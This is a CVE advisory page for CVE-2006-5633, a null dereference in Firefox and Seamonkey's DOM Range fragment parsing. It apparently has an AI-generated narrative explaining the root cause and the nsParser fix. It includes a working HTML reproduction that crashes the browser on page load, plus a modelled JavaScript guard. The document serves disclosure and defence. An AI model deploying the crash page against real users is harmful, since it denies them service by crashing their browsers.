CVE-2006-5633
Description
Firefox 1.5.0.7 and 2.0, and Seamonkey 1.1b, allow remote attackers to cause a denial of service (crash) by creating a range object using createRange, calling selectNode on a DocType node (DOCUMENT_TYPE_NODE), then calling createContextualFragment on the range, which triggers a null dereference. NOTE: the original Bugtraq post mentioned that code execution was possible, but follow-up analysis has shown that it is only a null dereference.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- cpe:2.3:a:mozilla:firefox:1.5.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:mozilla:firefox:2.0:*:*:*:*:*:*:*
- cpe:2.3:a:mozilla:seamonkey:1.1:beta:*:*:*:*:*:*
Patches
Vulnerability mechanics
Root cause
"The DOM Range object does not properly handle a DocType node when creating a document fragment, leading to a null dereference."
Attack vector
A remote attacker triggers the crash by serving an HTML page whose script creates a Range with `createRange`, calls `selectNode` on the document's DocType node, and then calls `createContextualFragment` on that range [ref_id=1]. No user interaction beyond loading the page is needed. The original advisory claimed code execution, but follow-up analysis showed the fault is a plain null dereference, so the impact is limited to a denial of service (browser crash) [ref_id=1].
Affected code
The bug is in the DOM Range fragment-parsing path. `selectNode` accepts a `DOCUMENT_TYPE_NODE` as the selected node, and `createContextualFragment` then hands the parser a fragment request for which the fragment content sink and parser context are not set up. The fix lands in `nsParser.cpp`, in `ParseFragment` and its handling of `nsIFragmentContentSink` and `mParserContext` [ref_id=2].
What the fix does
The patch adds checks in `nsParser::ParseFragment` that the fragment content sink and the parser context are present before fragment parsing proceeds. If either is missing, the function now returns an error instead of continuing into the code that dereferenced the null pointer for a range anchored on a DocType node [ref_id=2]. The crash is prevented by rejecting the invalid state up front rather than by changing how `selectNode` treats DocType nodes.
Preconditions
- HTML content with JavaScript that creates a range object and targets a DocType node; the victim only has to load the page.
Reproduction
```html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash() {
  var range;
  range = document.createRange();
  // document.firstChild is the <!DOCTYPE> node (DOCUMENT_TYPE_NODE, nodeType 10)
  range.selectNode(document.firstChild);
  // Fragment parsing against a range with no element context: null dereference
  range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>
```
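As an added example that is not part of the advisory, this page, or Mozilla's patch: a JavaScript model of the trigger above together with a caller-side guard that supplies a real element context instead of a DocType-anchored range. The constructed document tree, the `legacyContextFor` lookup standing in for the unpatched engine's behaviour (a `TypeError` plays the role of the null dereference), and all function names are assumptions for illustration; only the DOM `nodeType` values are the standard ones. It runs under node with no browser.

```javascript
// Added example, not code from the advisory or from Mozilla's patch.
// Models the CVE-2006-5633 trigger (a Range selecting the <!DOCTYPE> node
// passed to createContextualFragment) and a caller-side guard.
// DOM nodeType values are the standard ones.

const ELEMENT_NODE = 1;
const DOCUMENT_NODE = 9;
const DOCUMENT_TYPE_NODE = 10;
const DOCUMENT_FRAGMENT_NODE = 11;

// Nearest element ancestor by a plain parentNode walk (assumed stand-in for
// what the unpatched engine relied on). After selectNode(<!DOCTYPE>) the
// range's start container is the Document, which has no element ancestor,
// so this returns null.
function legacyContextFor(node) {
  for (let cur = node; cur; cur = cur.parentNode) {
    if (cur.nodeType === ELEMENT_NODE) return cur;
  }
  return null;
}

// Hardened lookup: same walk, but a Document or DocumentType start container
// falls back to the document's root element (<html>). Returns null only when
// the document has no root element at all.
function fragmentContextFor(node) {
  const direct = legacyContextFor(node);
  if (direct) return direct;
  const doc = node.nodeType === DOCUMENT_NODE ? node : node.ownerDocument;
  return (doc && doc.documentElement) || null;
}

// Guard around range.createContextualFragment(): with no element context,
// re-anchor a fresh range on the root element and parse there; with no root
// element either, fail with an Error instead of handing the engine an
// unparseable context.
function safeCreateContextualFragment(range, markup) {
  if (legacyContextFor(range.startContainer)) {
    return range.createContextualFragment(markup);
  }
  const ctx = fragmentContextFor(range.startContainer);
  if (!ctx) throw new Error('createContextualFragment: no element context');
  const safe = ctx.ownerDocument.createRange();
  safe.selectNodeContents(ctx);
  return safe.createContextualFragment(markup);
}

// Constructed stand-in for the reproduction's tree (<!DOCTYPE ...><html>),
// so the guard can be exercised outside a browser. createRange() follows DOM
// Range semantics for selectNode/selectNodeContents; createContextualFragment
// mimics the unpatched engine by throwing a TypeError (the null dereference)
// when no element context is found. Real DOM nodes expose the same interface.
function buildDoctypeTree() {
  const doc = { nodeType: DOCUMENT_NODE, parentNode: null, ownerDocument: null };
  const doctype = { nodeType: DOCUMENT_TYPE_NODE, parentNode: doc, ownerDocument: doc, childNodes: [] };
  const html = { nodeType: ELEMENT_NODE, tagName: 'HTML', parentNode: doc, ownerDocument: doc, childNodes: [] };
  doc.childNodes = [doctype, html];
  doc.firstChild = doctype;
  doc.documentElement = html;
  doc.createRange = () => {
    const range = { startContainer: doc, startOffset: 0 };
    // selectNode(n): start container is n's parent, offset is n's index.
    range.selectNode = (n) => {
      range.startContainer = n.parentNode;
      range.startOffset = n.parentNode.childNodes.indexOf(n);
    };
    range.selectNodeContents = (n) => { range.startContainer = n; range.startOffset = 0; };
    range.createContextualFragment = (markup) => {
      const ctx = legacyContextFor(range.startContainer);
      if (!ctx) throw new TypeError('null dereference in ParseFragment');
      return { nodeType: DOCUMENT_FRAGMENT_NODE, contextTag: ctx.tagName, markup };
    };
    return range;
  };
  return { doc, doctype, html };
}

// Replays the advisory's do_crash() steps on the constructed tree, once with
// the raw call and once through the guard, and reports what each produced.
function replayReproduction() {
  const { doc } = buildDoctypeTree();
  const range = doc.createRange();
  range.selectNode(doc.firstChild);          // the <!DOCTYPE> node
  let raw;
  try {
    raw = range.createContextualFragment('<span></span>').contextTag;
  } catch (e) {
    raw = e.constructor.name;                 // 'TypeError' on the unpatched path
  }
  const guarded = safeCreateContextualFragment(range, '<span></span>').contextTag;
  return { raw, guarded };
}

console.log(replayReproduction());           // { raw: 'TypeError', guarded: 'HTML' }
```

The guard is the pattern a page author can use when fragment parsing must be driven by ranges built from untrusted or script-controlled selections: never let the parse proceed without an element context, which is also the invariant the vendor fix enforces on the engine side.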
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- lists.grok.org.uk/pipermail/full-disclosure/2006-October/050416.html (nvd; Exploit)
- www.gotfault.net/research/advisory/gadv-firefox.txt (nvd; Exploit; Vendor Advisory)
- www.securityfocus.com/archive/1/450168/100/0/threaded (nvd; Exploit; Vendor Advisory)
- bugzilla.mozilla.org/show_bug.cgi (nvd; Exploit)
- bugzilla.redhat.com/bugzilla/show_bug.cgi (nvd; Exploit)
- www.securityfocus.com/archive/1/450155/100/0/threaded (nvd)
- www.securityfocus.com/archive/1/450167/100/0/threaded (nvd)
- www.securityfocus.com/archive/1/450682/100/200/threaded (nvd)
- www.securityfocus.com/archive/1/452803/100/0/threaded (nvd)
- www.securityfocus.com/bid/20799 (nvd)
- exchange.xforce.ibmcloud.com/vulnerabilities/29916 (nvd)